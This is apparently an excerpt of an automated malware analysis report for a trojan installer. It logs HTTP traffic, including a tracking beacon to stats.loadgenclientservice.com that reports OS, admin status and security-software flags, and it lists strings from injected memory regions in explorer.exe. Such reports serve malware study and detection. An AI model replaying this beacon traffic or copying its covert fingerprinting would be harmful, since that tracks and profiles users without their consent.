GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Sat, 20 Sep 2014 18:23:19 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1411237399.dop012.am4.t,1411237399.cds058.am4.c..GIF89a.............,...........D..;..

GET /ThawteTimestampingCA.crl HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: crl.thawte.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Server: Apache

ETag: "67d0ac3389aba998bf71f5ac72d60648:1403244909"

Last-Modified: Fri, 20 Jun 2014 06:15:09 GMT

Accept-Ranges: bytes

Content-Length: 341

Date: Sat, 20 Sep 2014 18:23:24 GMT

Connection: keep-alive

Content-Type: application/pkix-crl

0..Q0..0...*.H........0..1.0...U....ZA1.0...U....Western Cape1.0...U....Durbanville1.0...U....Thawte1.0...U....Thawte Certification1.0...U....Thawte Timestamping CA..140617000000Z..140930235959Z0...*.H...............pe..y.....$.{_... .}["....`4..>p}.........e..*?AC..kVA..$..l.j}......Z.&.]V.7.G}..=.G.xm'M.{......;...~...... ^.....caK.Hq..kHTTP/1.1 200 OK..Server: Apache..ETag: "67d0ac3389aba998bf71f5ac72d60648:1403244909"..Last-Modified: Fri, 20 Jun 2014 06:15:09 GMT..Accept-Ranges: bytes..Content-Length: 341..Date: Sat, 20 Sep 2014 18:23:24 GMT..Connection: keep-alive..Content-Type: application/pkix-crl..0..Q0..0...*.H........0..1.0...U....ZA1.0...U....Western Cape1.0...U....Durbanville1.0...U....Thawte1.0...U....Thawte Certification1.0...U....Thawte Timestamping CA..140617000000Z..140930235959Z0...*.H...............pe..y.....$.{_... .}["....`4..>p}.........e..*?AC..kVA..$..l.j}......Z.&.]V.7.G}..=.G.xm'M.{......;...~...... ^.....caK.Hq..k..

GET /installer_updates/000803/update.json HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: update.loadgenclientservice.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sat, 20 Sep 2014 18:23:18 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1393779143"

Last-Modified: Sun, 02 Mar 2014 16:52:23 GMT

Cache-Control: max-age=5448

Content-Length: 39

Content-Type: text/plain; charset=UTF-8

X-HW: 1411237398.dop019.am4.t,1411237398.cds041.am4.c

{"update_from_version":"NA","url":"NA"}HTTP/1.1 200 OK..Date: Sat, 20 Sep 2014 18:23:18 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1393779143"..Last-Modified: Sun, 02 Mar 2014 16:52:23 GMT..Cache-Control: max-age=5448..Content-Length: 39..Content-Type: text/plain; charset=UTF-8..X-HW: 1411237398.dop019.am4.t,1411237398.cds041.am4.c..{"update_from_version":"NA","url":"NA"}..

GET /installer.gif?action=started&browser=ie&browserver=6&ver=1_34_08_12&bic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&app=61915&appver=0&verifier=39aa73fdbfd54b44fad467ed5553801b&srcid=000803&upi=03a471124f01b8b4a21fa91e866e62ed&version_date=14-09-03&subid=0&zdata=0&xpiver=0_95&crxver=1_26_21&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=0&procstarttime=1411237378&procruntime=2&rnd=1411237380 HTTP/1.1

Host: stats.loadgenclientservice.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: wpyGmXlK9QCYJs/MYBaiiF1JmcZlegVGO0hWkBCFHoVkwxj80d Swm4m91R1z1fb

x-amz-request-id: 832AD7C14E8B127B

Date: Sat, 20 Sep 2014 18:23:20 GMT

Cache-Control: no-cache, must-revalidate

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Tue, 25 Feb 2014 00:04:39 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: wpyGmXlK9QCYJs/MYBaiiF1JmcZlegVGO0hWkBCFHoVkwxj80d Swm4m91R1z1fb..x-amz-request-id: 832AD7C14E8B127B..Date: Sat, 20 Sep 2014 18:23:20 GMT..Cache-Control: no-cache, must-revalidate..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Last-Modified: Tue, 25 Feb 2014 00:04:39 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

Explorer.EXE_1140_rwx_00FF0000_00002000:

SHELL32.DLL

SHELL32.DLL

ShellExecuteA

ShellExecuteA

KERNEL32.DLL

KERNEL32.DLL

.rsrc

.rsrc

.text

.text

Explorer.EXE_1140_rwx_01E00000_00001000:

|explorer.exeM_1140_

|explorer.exeM_1140_